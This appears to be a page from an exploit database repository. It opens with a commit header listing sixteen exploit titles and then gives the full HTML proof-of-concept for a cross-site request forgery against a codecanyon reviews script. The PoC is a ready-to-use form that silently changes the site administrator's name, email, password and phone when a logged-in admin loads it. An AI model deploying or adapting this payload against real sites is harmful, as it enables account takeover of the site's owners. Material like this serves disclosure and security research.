e3c06fe0f7
16 changes to exploits/shellcodes Angry IP Scanner 3.5.3 - Denial of Service (PoC) UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH) Cisco RV110W - Password Disclosure / Command Execution Safari - Proxy Object Type Confusion (Metasploit) Adminer 4.3.1 - Server-Side Request Forgery Responsive FileManager 9.13.4 - Multiple Vulnerabilities Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2) Huawei Router HG532e - Command Execution Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password) Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Double Your Bitcoin Script Automatic - Authentication Bypass
20 lines
No EOL
1 KiB
HTML
20 lines
No EOL
1 KiB
HTML
# Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery
|
|
# Date: 2018-12-13
|
|
# Exploit Author: Veyselxan
|
|
# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?s_rank=38
|
|
# Version: v1 (REQUIRED)
|
|
# Tested on: Linux
|
|
|
|
# 1 Poof Of Concept (Change password):
|
|
<html>
|
|
<body>
|
|
<form action="http://Target/action.php?action=profile" method="post" class="form-horizontal form-bordered">
|
|
<input class="form-control" name="name" value="Admin" type="text">
|
|
<input class="form-control" name="email" value="admin@ranksol.com" type="text">
|
|
<input class="form-control" name="password" value="password" type="text">
|
|
<input class="form-control" name="phone" value="+18323041166" type="text">
|
|
<input type="hidden" name="id" value="1">
|
|
<button type="submit" name="submit" value="submit" class="btn btn-fill btn-success "><span class="ace-icon fa fa-save bigger-120"></span>Save</button>
|
|
</form>
|
|
</body>
|
|
</html> |